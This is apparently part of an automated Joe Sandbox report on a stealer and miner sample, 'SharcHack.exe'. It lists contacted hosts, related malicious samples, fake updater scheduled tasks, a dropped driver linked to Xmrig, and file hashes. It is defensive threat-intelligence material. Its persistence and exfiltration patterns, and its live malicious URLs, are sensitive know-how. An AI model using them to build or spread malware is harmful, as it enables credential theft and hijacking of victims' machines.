http://www.microsoft.cx	powershell.exe, 0000002B.00000002.2600381025.00000265D851C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.avast.com/eula-avast-consumer-products	CheatEngine75.tmp, 00000008.00000003.2608237355.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795447097.0000000000B42000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2510314215.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000002.3279479466.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2451633880.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2335276886.0000000000B2E000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2394333330.0000000000B35000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2141172140.0000000000B30000.00000004.00000020.00020000.00000000.sdmp, CheatEngine75.tmp, 00000008.00000003.2795610782.0000000000B35000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.telegram.org/bot	v2.exe, 00000007.00000002.2163857464.0000000002E11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://d34hwk9wxgk5fi.cloudfront.net/K	CheatEngine75.tmp, 00000008.00000003.2141458144.0000000000AD2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	false
3.165.135.3	unknown	United States	16509	AMAZON-02US	false
18.66.161.123	d14mh4uvqj4iiz.cloudfront.net	United States	3	MIT-GATEWAYSUS	false
65.9.108.148	d34hwk9wxgk5fi.cloudfront.net	United States	16509	AMAZON-02US	false
104.21.85.189	ipbase.com	United States	13335	CLOUDFLARENETUS	false
65.9.108.93	unknown	United States	16509	AMAZON-02US	false
172.67.160.84	freegeoip.app	United States	13335	CLOUDFLARENETUS	false
13.226.4.166	d31tu1fsc224h4.cloudfront.net	United States	16509	AMAZON-02US	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581756
Start date and time:	2024-12-28 22:19:08 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 12m 0s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	65
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SharcHack.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@113/99@12/8
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 86% Number of executed functions: 68 Number of non-executed functions: 316
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 20.109.210.53, 20.242.39.171, 13.85.23.206, 13.107.246.63
Excluded domains from analysis (whitelisted): analytics.apis.mcafee.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, sadownload.mcafee.com, ctldl.windowsupdate.com, pool.hashvault.pro, update.reasonsecurity.com, pac.rlinfraservices.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, localweatherfree.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
16:19:56	API Interceptor	1x Sleep call for process: 3.exe modified
16:20:00	API Interceptor	94x Sleep call for process: powershell.exe modified
16:20:04	API Interceptor	57x Sleep call for process: v2.exe modified
16:20:10	API Interceptor	13x Sleep call for process: CheatEngine75.tmp modified
16:20:25	API Interceptor	1x Sleep call for process: updater.exe modified
16:20:58	API Interceptor	409x Sleep call for process: conhost.exe modified
22:20:16	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe
22:22:03	Task Scheduler	Run new task: EPPHealthCheck_Logon path: C:\Program Files\ReasonLabs\EPP\Uninstall.exe s>/auto-repair="UnifiedStub" /trigger:logon
22:22:03	Task Scheduler	Run new task: EPPHealthCheck_Time path: C:\Program Files\ReasonLabs\EPP\Uninstall.exe s>/auto-repair="UnifiedStub" /trigger:time

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	ip-api.com/json/?fields=61439
	987656789009800.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	good.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	ip-api.com/json/
	Client-built.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	DHL AWB-documents.lnk	Get hash	malicious	Divulge Stealer	Browse	ip-api.com/json/?fields=225545
	main.exe	Get hash	malicious	Python Stealer, Discord Token Stealer, PRYSMAX STEALER	Browse	ip-api.com/json/8.46.123.189?fields=192511
	main.exe	Get hash	malicious	Unknown	Browse	ip-api.com/json/8.46.123.189?fields=192511
	HX Design.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	ip-api.com/json/?fields=225545
	dF66DKQP7u.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse	ip-api.com/line/?fields=hosting
104.21.85.189	ypauPrrA08.exe	Get hash	malicious	Ades Stealer, BlackGuard, VEGA Stealer	Browse
	Loader.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Rags Stealer	Browse
	Nursultan.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Blank Grabber, Rags Stealer, Umbral Stealer, XWorm	Browse
	Pots.exe	Get hash	malicious	44userber Stealer, Rags Stealer	Browse
	aurora-live-20240221.exe	Get hash	malicious	Unknown	Browse
	dudick SystemDesk Important Crediential Notification 1.eml	Get hash	malicious	HTMLPhisher	Browse
	64drop.exe	Get hash	malicious	44Caliber Stealer, Rags Stealer	Browse
	123.scr.exe	Get hash	malicious	Unknown	Browse
	RP.sfx.exe	Get hash	malicious	44Caliber Stealer, Rags Stealer	Browse
	i6R4NsEd8t.exe	Get hash	malicious	Snake Keylogger	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	208.95.112.1
	987656789009800.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	good.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	208.95.112.1
	Client-built.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	DHL AWB-documents.lnk	Get hash	malicious	Divulge Stealer	Browse	208.95.112.1
	main.exe	Get hash	malicious	Python Stealer, Discord Token Stealer, PRYSMAX STEALER	Browse	208.95.112.1
	main.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	HX Design.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	208.95.112.1
	dF66DKQP7u.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
	2QaN4hOyJs.exe	Get hash	malicious	XWorm	Browse	208.95.112.1
cheatengine.org	SecuriteInfo.com.Trojan.InstallCore.4077.25967.22716.exe	Get hash	malicious	PureLog Stealer	Browse	104.20.94.94
cheatengine.org	SecuriteInfo.com.Trojan.InstallCore.4077.25967.22716.exe	Get hash	malicious	PureLog Stealer	Browse	172.67.35.220
ipbase.com	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	172.67.209.71
	ypauPrrA08.exe	Get hash	malicious	Ades Stealer, BlackGuard, VEGA Stealer	Browse	104.21.85.189
	Loader.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Rags Stealer	Browse	104.21.85.189
	Nursultan.exe	Get hash	malicious	44Caliber Stealer, BlackGuard, Blank Grabber, Rags Stealer, Umbral Stealer, XWorm	Browse	104.21.85.189
	External.exe	Get hash	malicious	Ades Stealer, BlackGuard, VEGA Stealer	Browse	172.67.209.71
	xj40xovMsm.exe	Get hash	malicious	AsyncRAT, AveMaria, Keyzetsu Clipper, MicroClip, PureLog Stealer, RL STEALER, RedLine	Browse	172.67.209.71
	Pots.exe	Get hash	malicious	44userber Stealer, Rags Stealer	Browse	104.21.85.189
	qdHMT36Tn9.exe	Get hash	malicious	44Caliber Stealer, Njrat, Rags Stealer	Browse	172.67.209.71
	64drop.exe	Get hash	malicious	44Caliber Stealer, Rags Stealer	Browse	104.21.85.189
	123.scr.exe	Get hash	malicious	Unknown	Browse	104.21.85.189
bg.microsoft.map.fastly.net	3KFFG52TBI.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	a2mNMrPxow.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	tzA45NGAW4.lnk	Get hash	malicious	Unknown	Browse	199.232.210.172
	sYPORwmgwQ.exe	Get hash	malicious	Unknown	Browse	199.232.214.172
	New Upd v1.1.0.exe	Get hash	malicious	LummaC	Browse	199.232.214.172
	JA7cOAGHym.exe	Get hash	malicious	Vidar	Browse	199.232.214.172
	wp.bat	Get hash	malicious	Unknown	Browse	199.232.210.172
	final.exe	Get hash	malicious	Meterpreter	Browse	199.232.214.172
	n5Szx8qsFB.lnk	Get hash	malicious	Unknown	Browse	199.232.214.172
	A4FY1OA97K.lnk	Get hash	malicious	DanaBot	Browse	199.232.214.172
eu-api.openweathermap.org	http://dcr0eadbm64ph.cloudfront.net/IDCVt99WXiQU.exe	Get hash	malicious	Poisonivy	Browse	141.95.99.79

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-02US	https://kn0wbe4.compromisedblog.com/XZHJISTcycW1tZkROWG92Y2ZEc21laS80dzNTR2N0eEsvTDFRWGFNODdGaGtjNGo5VzRyMFRUQmFLM0grcGxUbnBSTVFhMEg2Smd3UkovaXVjaUpIcG1hZG5CQnh5aFlZTXNqNldTdm84cE5CMUtld0dCZzN4ZUFRK2lvL1FWTG92NUJsMnJ3OHFGckdTNFhnMkFUTFZFZTdKRnVJaTRuRGFKdXVyeUdCVytuQzdnMEV1ZExSMnlwWi9RPT0tLTdnZjhxQVZPbUdTdFZXVUEtLXA0bHNCNGxmeTdrdmlkWWRVcmRXRWc9PQ==?cid=2310423310	Get hash	malicious	KnowBe4	Browse	3.160.188.119
	oiA5KmV0f0.exe	Get hash	malicious	Njrat	Browse	18.197.239.5
	db0fa4b8db0333367e9bda3ab68b8042.x86.elf	Get hash	malicious	Mirai, Gafgyt	Browse	35.75.100.61
	arm6.elf	Get hash	malicious	Gafgyt	Browse	54.171.230.55
	wlw68k.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	nshkarm5.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	https://app.slintel-privacy.com/links/J95tSop4o/SS6JytVVw/qm84IUL58/GFC-9kqk1-	Get hash	malicious	Unknown	Browse	3.109.113.207
	http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfh	Get hash	malicious	Unknown	Browse	44.237.4.100
	arm6.elf	Get hash	malicious	Gafgyt	Browse	54.171.230.55
	yakuza.arm4.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
TUT-ASUS	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	208.95.112.1
	987656789009800.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	good.exe	Get hash	malicious	PureLog Stealer, zgRAT	Browse	208.95.112.1
	http://au.kirmalk.com/watch.php?vid=7750fd3c8	Get hash	malicious	Unknown	Browse	162.252.214.4
	Client-built.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	DHL AWB-documents.lnk	Get hash	malicious	Divulge Stealer	Browse	208.95.112.1
	main.exe	Get hash	malicious	Python Stealer, Discord Token Stealer, PRYSMAX STEALER	Browse	208.95.112.1
	main.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	HX Design.exe	Get hash	malicious	Python Stealer, Blank Grabber	Browse	208.95.112.1
	file.exe	Get hash	malicious	LummaC, Amadey, AsyncRAT, LummaC Stealer, XWorm	Browse	208.95.112.1
AMAZON-02US	https://kn0wbe4.compromisedblog.com/XZHJISTcycW1tZkROWG92Y2ZEc21laS80dzNTR2N0eEsvTDFRWGFNODdGaGtjNGo5VzRyMFRUQmFLM0grcGxUbnBSTVFhMEg2Smd3UkovaXVjaUpIcG1hZG5CQnh5aFlZTXNqNldTdm84cE5CMUtld0dCZzN4ZUFRK2lvL1FWTG92NUJsMnJ3OHFGckdTNFhnMkFUTFZFZTdKRnVJaTRuRGFKdXVyeUdCVytuQzdnMEV1ZExSMnlwWi9RPT0tLTdnZjhxQVZPbUdTdFZXVUEtLXA0bHNCNGxmeTdrdmlkWWRVcmRXRWc9PQ==?cid=2310423310	Get hash	malicious	KnowBe4	Browse	3.160.188.119
	oiA5KmV0f0.exe	Get hash	malicious	Njrat	Browse	18.197.239.5
	db0fa4b8db0333367e9bda3ab68b8042.x86.elf	Get hash	malicious	Mirai, Gafgyt	Browse	35.75.100.61
	arm6.elf	Get hash	malicious	Gafgyt	Browse	54.171.230.55
	wlw68k.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	nshkarm5.elf	Get hash	malicious	Unknown	Browse	54.171.230.55
	https://app.slintel-privacy.com/links/J95tSop4o/SS6JytVVw/qm84IUL58/GFC-9kqk1-	Get hash	malicious	Unknown	Browse	3.109.113.207
	http://prowebideas.com/dsfdgfhgdfsdfdgfhgdrwet/gdfsdfdgfhgfgdfsdfdgfh/gfsdfdgfhgfgdfsdfdgfhgdfsdfdgfh	Get hash	malicious	Unknown	Browse	44.237.4.100
	arm6.elf	Get hash	malicious	Gafgyt	Browse	54.171.230.55
	yakuza.arm4.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
MIT-GATEWAYSUS	Hwacaj.exe	Get hash	malicious	Darkbot	Browse	18.161.69.8
	https://haleborealis.com	Get hash	malicious	Unknown	Browse	18.165.220.57
	https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=en	Get hash	malicious	Unknown	Browse	18.161.97.93
	db0fa4b8db0333367e9bda3ab68b8042.i686.elf	Get hash	malicious	Mirai, Gafgyt	Browse	19.235.79.192
	installer.bat	Get hash	malicious	Vidar	Browse	18.165.220.106
	skript.bat	Get hash	malicious	Vidar	Browse	18.165.220.66
	lem.exe	Get hash	malicious	Vidar	Browse	18.164.116.98
	xd.mips.elf	Get hash	malicious	Mirai	Browse	18.113.234.176
	xd.arm7.elf	Get hash	malicious	Mirai	Browse	19.34.137.22
	xd.x86.elf	Get hash	malicious	Mirai	Browse	18.50.43.230

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	l0zocrLiVW.exe	Get hash	malicious	LummaC	Browse	104.21.85.189 18.66.161.123 172.67.160.84
	FLKCAS1DzH.bat	Get hash	malicious	Unknown	Browse	104.21.85.189 18.66.161.123 172.67.160.84
	tzA45NGAW4.lnk	Get hash	malicious	Unknown	Browse	104.21.85.189 18.66.161.123 172.67.160.84
	lumma.ps1	Get hash	malicious	LummaC	Browse	104.21.85.189 18.66.161.123 172.67.160.84
	Titan.exe	Get hash	malicious	Unknown	Browse	104.21.85.189 18.66.161.123 172.67.160.84
	Titan.exe	Get hash	malicious	Unknown	Browse	104.21.85.189 18.66.161.123 172.67.160.84
	SharcHack.exe	Get hash	malicious	Ades Stealer, BlackGuard, NitroStealer, VEGA Stealer	Browse	104.21.85.189 18.66.161.123 172.67.160.84
	iviewers.dll	Get hash	malicious	LummaC	Browse	104.21.85.189 18.66.161.123 172.67.160.84
	Flasher.exe	Get hash	malicious	Luca Stealer, Rusty Stealer	Browse	104.21.85.189 18.66.161.123 172.67.160.84
	738KZNfnzz.exe	Get hash	malicious	LummaC	Browse	104.21.85.189 18.66.161.123 172.67.160.84
a0e9f5d64349fb13191bc781f81f42e1	gdi32.dll	Get hash	malicious	LummaC	Browse	65.9.108.93 3.165.135.3 18.66.161.123 65.9.108.148 13.226.4.166
	Loader.exe	Get hash	malicious	LummaC	Browse	65.9.108.93 3.165.135.3 18.66.161.123 65.9.108.148 13.226.4.166
	Crosshair-X.exe	Get hash	malicious	LummaC	Browse	65.9.108.93 3.165.135.3 18.66.161.123 65.9.108.148 13.226.4.166
	!Set-up..exe	Get hash	malicious	LummaC Stealer	Browse	65.9.108.93 3.165.135.3 18.66.161.123 65.9.108.148 13.226.4.166
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse	65.9.108.93 3.165.135.3 18.66.161.123 65.9.108.148 13.226.4.166
	Set-up.exe	Get hash	malicious	LummaC	Browse	65.9.108.93 3.165.135.3 18.66.161.123 65.9.108.148 13.226.4.166
	iien1HBbB3.exe	Get hash	malicious	LummaC	Browse	65.9.108.93 3.165.135.3 18.66.161.123 65.9.108.148 13.226.4.166
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse	65.9.108.93 3.165.135.3 18.66.161.123 65.9.108.148 13.226.4.166
	oe9KS7ZHUc.exe	Get hash	malicious	LummaC	Browse	65.9.108.93 3.165.135.3 18.66.161.123 65.9.108.148 13.226.4.166
	MPgkx6bQIQ.exe	Get hash	malicious	LummaC	Browse	65.9.108.93 3.165.135.3 18.66.161.123 65.9.108.148 13.226.4.166

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files\Google\Libs\WR64.sys	0Ty.png.exe	Get hash	malicious	Xmrig	Browse
	Qhx6a6VLAH.exe	Get hash	malicious	Xmrig	Browse
	88aext0k.exe	Get hash	malicious	Xmrig	Browse
	gaozw40v.exe	Get hash	malicious	Xmrig	Browse
	c2.exe	Get hash	malicious	Xmrig	Browse
	ldr.ps1	Get hash	malicious	GO Miner, Xmrig	Browse
	ZppxPm0ASs.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Vidar, Xmrig	Browse
	feZvV3DCj8.exe	Get hash	malicious	Xmrig	Browse
	services64.exe	Get hash	malicious	Xmrig	Browse

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\3.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	3715584
Entropy (8bit):	7.962148701344369
Encrypted:	false
SSDEEP:	98304:0eZMJ/TOW8jMNjfytwpCm4M47t9XI/vioBi:XaqWuMNVpCm/4AHBi
MD5:	A4C45AAF11FC601009A5682FD23790EE
SHA1:	A8EAC848583296B135AF5A473FC8CE48AF970B65
SHA-256:	D89C0E12B5FBBE103522FA152ADB3EDD6AFFF88D34D2BBF58CAF28E9C4DA0526
SHA-512:	CC735B14E4DF0260C8302761E52FD84BA06310D2DDE96C9089A8066F72B3B93D80C9E6548A18C35ECADD54479E99F80090AC31B7F30B682129B70B93095373A9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....%pg...............&......8................@............................. 9.......8...`... ...............................................8.......9.......8...............9...............................8.(...................D.8..............................text...x...........................`..`.data... .7.......7.................@....rdata........8......z8.............@..@.pdata........8.......8.............@..@.xdata........8.......8.............@..@.bss....8.....8..........................idata........8.......8.............@....CRT....h.....8.......8.............@....tls..........8.......8.............@....rsrc.........9.......8.............@....reloc........9.......8.............@..B........................................................................................................................................................................

C:\Program Files\Google\Libs\WR64.sys

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: 0Ty.png.exe, Detection: malicious, Browse Filename: Qhx6a6VLAH.exe, Detection: malicious, Browse Filename: 88aext0k.exe, Detection: malicious, Browse Filename: gaozw40v.exe, Detection: malicious, Browse Filename: c2.exe, Detection: malicious, Browse Filename: ldr.ps1, Detection: malicious, Browse Filename: ZppxPm0ASs.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: feZvV3DCj8.exe, Detection: malicious, Browse Filename: services64.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Program Files\Google\Libs\g.log

Download File

Process:	C:\Windows\System32\cmd.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	118
Entropy (8bit):	3.0142860822293245
Encrypted:	false
SSDEEP:	3:QrjaP8FvEMlWlK3Fflovw9yxPMN/iKlS2tfIn:Q/a2vEMlWlKovw9yCdiKI2+n
MD5:	F17385D569C8B4AC1615974E65D023BD
SHA1:	1A225BE0148C906EA8C25F522A802376CCCB5F8F
SHA-256:	B0DF1034A7A46530513C2DEA5F7C64EDB7E20EE4C6508329FF3C56F5440F237F
SHA-512:	D61E19350FCB3BF6E021F67C72D040387082B93231232F9A04D1946E32678861FE404BD0B3EF3AD7E07E211C069A327FC5211CB27EC990AE75F8235F36526A07
Malicious:	false
Preview:	..N.a.m.e. . . . . . . .V.i.d.e.o.P.r.o.c.e.s.s.o.r. . .....8.N.S.P.W.N.9.V.5. . .9.2.Z.G.5.7.M. . . . . . . . . .....

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\v2.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2589
Entropy (8bit):	5.347411404509576
Encrypted:	false
SSDEEP:	48:MxHKXAHKze41qHiYHKh3oPtHo6+JHOHKU57UxHKMR0mHKtXoCayH5H/HKMHsLHmY:iqQqzfwCYqh3oPtI6IuqU57UxqMRnqNq
MD5:	696C6189688136406D72A0798AF5224F
SHA1:	6826DD4A2B09E5782E8A6B5AF6BEADF218CA616E
SHA-256:	484E1D3A551A6570FB7861010591CB48E36F1F81625879622AA8E12BAC367639
SHA-512:	17FE4A4C421A997265541E05E77FF4D7F5BFE6007D41A2293B3C62A0079CEDD0BCB346EDC6038A41F43DFE4D86493CE52EFBA34F92CF173D422809A9948BD746
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Security, Version=4.0.0.0, Culture=neutral, PublicKeyT

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Temp\3.exe

Download File

Process:	C:\Users\user\Desktop\SharcHack.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	3715584
Entropy (8bit):	7.962148701344369
Encrypted:	false
SSDEEP:	98304:0eZMJ/TOW8jMNjfytwpCm4M47t9XI/vioBi:XaqWuMNVpCm/4AHBi
MD5:	A4C45AAF11FC601009A5682FD23790EE
SHA1:	A8EAC848583296B135AF5A473FC8CE48AF970B65
SHA-256:	D89C0E12B5FBBE103522FA152ADB3EDD6AFFF88D34D2BBF58CAF28E9C4DA0526
SHA-512:	CC735B14E4DF0260C8302761E52FD84BA06310D2DDE96C9089A8066F72B3B93D80C9E6548A18C35ECADD54479E99F80090AC31B7F30B682129B70B93095373A9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....%pg...............&......8................@............................. 9.......8...`... ...............................................8.......9.......8...............9...............................8.(...................D.8..............................text...x...........................`..`.data... .7.......7.................@....rdata........8......z8.............@..@.pdata........8.......8.............@..@.xdata........8.......8.............@..@.bss....8.....8..........................idata........8.......8.............@....CRT....h.....8.......8.............@....tls..........8.......8.............@....rsrc.........9.......8.............@....reloc........9.......8.............@..B........................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\527e1164-4ee1-43ec-bc1a-5ec7ccfa30c2

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\82f3f1ef-2980-4c26-b878-15e204a16e19

Download File

Process:	C:\Users\user\AppData\Local\Temp\v2.exe
